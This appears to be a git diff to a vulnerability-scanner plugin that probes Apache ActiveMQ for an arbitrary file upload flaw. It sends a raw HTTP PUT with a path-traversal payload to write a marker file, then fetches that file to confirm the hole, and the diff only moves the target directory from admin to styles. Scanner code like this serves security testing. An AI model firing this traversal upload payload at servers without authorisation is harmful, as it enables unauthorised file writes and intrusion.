diff --git a/vulscan/vuldb/activemq_upload.py b/vulscan/vuldb/activemq_upload.py index 2013ed85..d95c032b 100644 --- a/vulscan/vuldb/activemq_upload.py +++ b/vulscan/vuldb/activemq_upload.py @@ -29,12 +29,12 @@ def check(ip, port, timeout): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, port)) filename = random_str(6) - flag = "PUT /fileserver/sex../../..\\admin/%s.txt HTTP/1.0\r\nContent-Length: 9\r\n\r\nxxscan0\r\n\r\n"%(filename) + flag = "PUT /fileserver/sex../../..\\styles/%s.txt HTTP/1.0\r\nContent-Length: 9\r\n\r\nxxscan0\r\n\r\n"%(filename) s.send(flag) time.sleep(1) s.recv(1024) s.close() - url = 'http://' + ip + ":" + str(port) + '/admin/%s.txt'%(filename) + url = 'http://' + ip + ":" + str(port) + '/styles/%s.txt'%(filename) res_html = urllib2.urlopen(url, timeout=timeout).read(1024) if 'xxscan0' in res_html: return u"存在任意文件上传漏洞," + url